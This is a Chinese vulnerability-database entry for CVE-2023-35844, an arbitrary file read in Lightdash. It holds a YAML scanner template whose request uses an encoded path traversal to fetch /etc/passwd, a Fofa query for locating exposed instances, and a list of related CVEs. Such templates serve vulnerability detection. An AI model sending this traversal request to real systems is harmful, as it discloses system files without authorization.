CVE-2023-35844: Lightdash Arbitrary File Read

漏洞描述

PoC代码[已公开]

id: CVE-2023-35844

info:
  name: Lightdash Arbitrary File Read
  author: laohuan12138
  severity: high
  verified: true
  description: |
    Lightdash是一款数据分析平台，它可以让数据团队和其他业务部门聚集在一起以做出更好的数据驱动决策
    Lightdash 0.510.3之前版本存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。
    Fofa: title=="Lightdash"
    
  reference:
    - https://mp.weixin.qq.com/s/QflYIUwjvrPbrsxrgPp3ew

  tags: cve,cve2023,lfi
  created: 2023/06/26

rules:
  r0:
    request:
      method: GET
      path: /api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()

相关漏洞推荐

• CVE-2023-35844: Lightdash version <= 0.510.3 Arbitrary File Read POC

  2025-08-01 | Lightdash
  packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they all...

• CVE-2024-6586: Lightdash v0.1024.6 - Server-Side Request Forgery POC

  2025-08-01 | Lightdash
  Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.10...

• Lightdash CVE-2023-35844 任意文件读取漏洞 无POC

  2024-02-07 | Lightdash

• PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

  2025-09-19 | PrestaShop
  在 PrestaShop 的 tshirtecommerce（又名自定义产品设计器）组件 2.1.4 中发现了一个问题。可以使用受损的 product_id GET 参数伪造 HTTP 请求，以利用前...

• PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

  2025-09-19 | PrestaShop
  Snegurka for PrestaShop模块中的“Referral and Affiliation Program”（推荐和联盟计划）版本3.5.1及之前版本中存在漏洞。通过在方法'R...